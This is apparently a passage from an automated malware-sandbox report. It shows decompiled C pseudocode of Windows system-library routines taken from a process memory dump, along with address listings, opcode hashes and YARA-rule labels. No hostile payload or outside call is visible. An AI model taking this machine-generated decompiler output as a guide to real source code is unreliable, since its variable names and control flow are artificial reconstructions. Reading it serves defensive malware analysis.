									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03614620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0363F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0363F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E035F52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0360EB70(1, 0x36e79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0360AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E036395D0();
																			L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0363B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03633D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0363B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x03614128
0x03614135
0x0361413c
0x03614141
0x03614145
0x03614147
0x0361414e
0x03614151
0x03614159
0x0361415c
0x03614160
0x03614164
0x03614168
0x0361416c
0x0361417f
0x03614181
0x0361446a
0x0361446a
0x0361418c
0x03614195
0x03614199
0x03614432
0x03614439
0x0361443d
0x03614442
0x03614447
0x00000000
0x0361419f
0x036141a3
0x036141b1
0x036141b9
0x036141bd
0x036145db
0x036145db
0x00000000
0x036141c3
0x036141c3
0x036141ce
0x036141d4
0x0365e138
0x0365e13e
0x0365e169
0x0365e16d
0x0365e19e
0x0365e16f
0x0365e16f
0x0365e175
0x0365e179
0x0365e18f
0x0365e193
0x00000000
0x0365e199
0x00000000
0x0365e199
0x0365e193
0x00000000
0x00000000
0x00000000
0x036141da
0x036141da
0x036141df
0x036141e4
0x036141ec
0x03614203
0x03614207
0x0365e1fd
0x03614222
0x03614226
0x0365e1f3
0x0365e1f3
0x0361422c
0x0361422c
0x03614233
0x0365e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03614239
0x03614239
0x03614239
0x03614239
0x03614233
0x03614226
0x036141ee
0x036141ee
0x036141f4
0x03614575
0x0365e1b1
0x0365e1b1
0x00000000
0x0361457b
0x0361457b
0x03614582
0x0365e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x03614588
0x03614588
0x0361458c
0x0365e1c4
0x0365e1c4
0x00000000
0x03614592
0x03614592
0x03614599
0x0365e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0361459f
0x0361459f
0x036145a3
0x0365e1d7
0x0365e1e4
0x00000000
0x036145a9
0x036145a9
0x036145b0
0x0365e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x036145b6
0x036145b6
0x036145b6
0x00000000
0x036145b6
0x036145b0
0x036145a3
0x03614599
0x0361458c
0x03614582
0x00000000
0x00000000
0x00000000
0x00000000
0x036141f4
0x0361423e
0x03614241
0x036145c0
0x036145c4
0x00000000
0x036145ca
0x036145ca
0x00000000
0x0365e207
0x0365e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x036145d1
0x00000000
0x00000000
0x036145ca
0x00000000
0x03614247
0x03614247
0x03614247
0x03614249
0x03614249
0x03614249
0x03614251
0x03614251
0x03614257
0x0361425f
0x0361426e
0x03614270
0x0361427a
0x0365e219
0x0365e219
0x03614280
0x03614282
0x03614456
0x036145ea
0x00000000
0x036145f0
0x0365e223
0x00000000
0x0365e223
0x0361445c
0x0361445c
0x00000000
0x0361445c
0x00000000
0x03614288
0x0361428c
0x0365e298
0x03614292
0x03614292
0x0361429e
0x036142a3
0x036142a7
0x036142ac
0x0365e22d
0x036142b2
0x036142b2
0x036142b9
0x036142bc
0x036142c2
0x036142ca
0x036142cd
0x036142cd
0x036142d4
0x0361433f
0x0361433f
0x036142d6
0x036142d6
0x036142d9
0x036142dd
0x036142eb
0x0365e23a
0x036142f1
0x03614305
0x0361430d
0x03614315
0x03614318
0x0361431f
0x03614322
0x0361432e
0x0361433b
0x0361433b
0x00000000
0x0361432e
0x036142eb
0x0361434c
0x0361434e
0x03614352
0x03614359
0x0361435e
0x03614361
0x0361436e
0x0361438a
0x0361438e
0x03614396
0x0361439e
0x036143a1
0x036143ad
0x036143bb
0x036143bb
0x036143ad
0x0361436e
0x036143bf
0x036143c5
0x03614463
0x03614463
0x036143ce
0x036143d5
0x036143d9
0x036143df
0x03614475
0x03614479
0x03614491
0x03614491
0x03614479
0x036143e5
0x036143eb
0x036143f4
0x036143f6
0x036143f9
0x036143fc
0x036143ff
0x036144e8
0x036144ed
0x036144f3
0x0365e247
0x00000000
0x036144f9
0x03614504
0x03614508
0x0361450f
0x0365e269
0x00000000
0x03614515
0x03614519
0x03614531
0x03614534
0x03614537
0x0361453e
0x03614541
0x0361454a
0x0365e255
0x0365e255
0x0365e25b
0x0365e25e
0x0365e261
0x0365e261
0x03614555
0x03614559
0x0361455d
0x0365e26d
0x0365e270
0x0365e274
0x0365e27a
0x0365e27d
0x0365e28e
0x0365e28e
0x03614563
0x03614563
0x03614569
0x03614569
0x00000000
0x0361455d
0x0361450f
0x00000000
0x036144f3
0x036143ff
0x03614405
0x03614405
0x03614405
0x036142ac
0x0361428c
0x03614282
0x03614407
0x0361440d
0x0365e2af
0x0365e2af
0x03614413
0x03614413
0x00000000
0x036141d4
0x00000000
0x036141c3
0x036141bd
0x03614415
0x03614415
0x03614416
0x03614417
0x03614429
0x0361416e
0x0361416e
0x03614175
0x03614498
0x0361449f
0x0365e12d
0x00000000
0x0365e133
0x00000000
0x0365e133
0x036144a5
0x036144a5
0x036144aa
0x00000000
0x036144bb
0x036144ca
0x036144d6
0x036144d7
0x036144d8
0x036144e3
0x036144e3
0x036144aa
0x0361417b
0x0361417b
0x0361417b
0x00000000
0x0361417b
0x03614175
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67829f0288bf7d7f616ecd7f8964095a5fc383764680931d0e49514a2ac3bdd1
Instruction ID: f044bc88cd81c3a8ff311674ff76bce3f70266d8b71bd1f4f95f6b31a85d8a0c
Opcode Fuzzy Hash: 67829f0288bf7d7f616ecd7f8964095a5fc383764680931d0e49514a2ac3bdd1
Instruction Fuzzy Hash: A9F16B746083118BCB25CF5AC580A7AB7F1EF88714F48496EF886CB350EB35D9A1CB56

Uniqueness

Uniqueness Score: -1.00%

Function 036220A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E036220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x36e8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03622EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03622EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E035F58EC(_t240);
									_t221 =  *0x36e5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x36e5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03634A2C(0x36e6e40, 0x3634b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03617D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x35d5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0362F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0362F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03677016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03612400(_t267 + 0x20);
															}
															L03612400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03622397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03612280(_t134, 0x36e8608);
									__eflags =  *0x36e6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0360FFB0(_t198, _t241, 0x36e8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x36e6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x36e8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03626B90(_t210,  &_v64);
										_t262 =  *0x36e8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0362E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E036397C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0363006A(0x36e8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x36e8608);
												E0363B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x36e6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x36e6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0360FFB0(_t198, _t240, 0x36e8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E036300C2(0x36e8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x036220a0
0x036220a8
0x036220ad
0x036220b3
0x036220b8
0x036220c2
0x036220c7
0x036220cb
0x036220d2
0x03622263
0x03622266
0x03665836
0x03665836
0x00000000
0x0362226c
0x0362226c
0x03622270
0x03622274
0x036220e2
0x036220e2
0x036220e6
0x036220ee
0x036657dc
0x036657de
0x036657ec
0x036657ec
0x036657f1
0x036657f3
0x036657f8
0x00000000
0x036657f8
0x036657e0
0x036657e4
0x036657ea
0x00000000
0x00000000
0x00000000
0x036657ea
0x036220f4
0x036220f4
0x036220f8
0x036220f8
0x036220fc
0x03622100
0x03622106
0x03622201
0x03622206
0x0362220b
0x0362220e
0x036222a9
0x036222ac
0x00000000
0x00000000
0x036222b2
0x036222b5
0x03665801
0x03665806
0x00000000
0x00000000
0x03665810
0x03665815
0x03665818
0x00000000
0x00000000
0x0366581e
0x036222bb
0x036222bb
0x03622218
0x03622218
0x0362221c
0x03622220
0x03622222
0x036222c2
0x036222c4
0x036222dc
0x036222dc
0x036222e1
0x00000000
0x00000000
0x00000000
0x036222e7
0x036222c8
0x036222cd
0x036222d3
0x036222d6
0x03665823
0x03665825
0x03665827
0x00000000
0x00000000
0x0366582d
0x00000000
0x0366582d
0x00000000
0x03622228
0x03622228
0x00000000
0x03622228
0x03622222
0x03622214
0x03622214
0x00000000
0x03622114
0x03622114
0x03622114
0x0362211a
0x0362211c
0x03622348
0x0362234d
0x03665840
0x03665845
0x03665848
0x0366584e
0x0366584e
0x03665848
0x03622353
0x03622355
0x03622388
0x03622388
0x03622368
0x0362236a
0x0362236c
0x0362238f
0x00000000
0x0362236e
0x0362236e
0x0362218e
0x0362218e
0x03622191
0x03622195
0x03665a03
0x03665a06
0x03665a0c
0x03665a0f
0x03665a11
0x03665a13
0x03665a13
0x03665a19
0x03665a1f
0x00000000
0x0362219b
0x0362219b
0x036221a0
0x03622282
0x03622284
0x03622284
0x03622284
0x03622284
0x036221a6
0x036221a9
0x036221ac
0x036221ae
0x036221b3
0x0362228b
0x03622290
0x03622379
0x03622296
0x03622298
0x03622298
0x03622290
0x036221b9
0x036221be
0x036222a2
0x036222a2
0x036221c4
0x036221c8
0x036221cc
0x036221d0
0x036221d4
0x036221de
0x036221e3
0x03665a29
0x03665a2c
0x00000000
0x00000000
0x03665a3b
0x00000000
0x036221e9
0x036221e9
0x036221e9
0x036221ee
0x036221f1
0x03665a45
0x03665a4b
0x03665a52
0x03665a58
0x03665a5d
0x03665a5f
0x03665a71
0x03665a61
0x03665a6a
0x03665a6a
0x03665a76
0x03665a79
0x03665a7f
0x03665a83
0x03665a85
0x03665a87
0x03665a87
0x03665a8c
0x03665a91
0x03665a97
0x03665a9f
0x03665aa0
0x03665aa1
0x03665aa6
0x03665aab
0x03665ab1
0x03665ab3
0x03665ab9
0x03665aca
0x03665ad4
0x03665ad4
0x03665ade
0x03665ade
0x03665aab
0x03665a79
0x03665a52
0x036221f7
0x036221f9
0x036221fe
0x036221fe
0x036221e3
0x03622195
0x0362236c
0x03622122
0x03622122
0x03622124
0x03622231
0x03622236
0x03622236
0x03622238
0x03622238
0x03622240
0x03622242
0x03622244
0x036659fc
0x0362218c
0x0362218c
0x00000000
0x0362218c
0x0362224a
0x0362224f
0x03622256
0x03622304
0x03622309
0x0362230f
0x0362231e
0x0362231e
0x0362231e
0x03622320
0x03622325
0x0362232a
0x0362232c
0x0362233e
0x0362233e
0x00000000
0x0362232c
0x03622311
0x03622317
0x0362231a
0x0362231c
0x03622380
0x03622380
0x03622380
0x03622384
0x00000000
0x00000000
0x03622386
0x00000000
0x0362231c
0x0362225c
0x0362225c
0x00000000
0x0362225c
0x0362212a
0x03622134
0x03622138
0x0362213d
0x03665858
0x03665863
0x03665863
0x03665867
0x0366586a
0x00000000
0x00000000
0x0366586c
0x0366586c
0x03665871
0x03665875
0x03665877
0x03665997
0x0366599c
0x036659a1
0x036659a7
0x036659a7
0x00000000
0x036659a7
0x0366587d
0x00000000
0x0366588b
0x0366588b
0x03665890
0x03665892
0x03665894
0x03665899
0x0366589b
0x036658a0
0x036658a0
0x036658aa
0x036658b2
0x036658b6
0x036658be
0x036658c6
0x036658c9
0x0366590d
0x03665917
0x0366591a
0x0366591c
0x03665920
0x03665928
0x0366592a
0x0366592c
0x0366592e
0x0366592e
0x036658cb
0x036658cd
0x036658d8
0x036658e0
0x036658f4
0x036658fe
0x036658fe
0x0366593a
0x0366593e
0x03665940
0x03665942
0x00000000
0x03665944
0x03665944
0x03665949
0x0366594e
0x0366594e
0x03665953
0x0366595b
0x03665976
0x03665976
0x0366597a
0x0366597f
0x00000000
0x00000000
0x00000000
0x00000000
0x03665981
0x03665981
0x03665981
0x03665983
0x03665988
0x0366598d
0x03665991
0x03665991
0x00000000
0x0366595d
0x0366595d
0x03665963
0x03665965
0x00000000
0x00000000
0x00000000
0x00000000
0x03665967
0x03665967
0x0366596b
0x0366596d
0x00000000
0x00000000
0x0366596f
0x03665971
0x03665971
0x03665974
0x00000000
0x00000000
0x00000000
0x03665974
0x00000000
0x03665967
0x0366595b
0x03665942
0x03665863
0x03622143
0x03622143
0x03622149
0x0362214f
0x036222f1
0x036222f6
0x00000000
0x03622173
0x03622173
0x0362217d
0x03622181
0x03622186
0x036659ae
0x036659b2
0x036659b5
0x036659b7
0x036659ba
0x036659cd
0x036659d1
0x036659d5
0x036659d9
0x036659db
0x00000000
0x00000000
0x036659dd
0x036659dd
0x036659e1
0x036659e4
0x036659e7
0x036659ee
0x036659ee
0x036659f3
0x036659f3
0x00000000
0x03622186
0x0362214f
0x03622106
0x03622266
0x036220d8
0x036220da
0x036220e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c857756c083884ff66883834321b6a935358916180e22a86ed58792d07e6f1d
Instruction ID: a249faa22168a99dbd6305e26118c1bf8c66447105376d377153a4a8677c9c47
Opcode Fuzzy Hash: 2c857756c083884ff66883834321b6a935358916180e22a86ed58792d07e6f1d
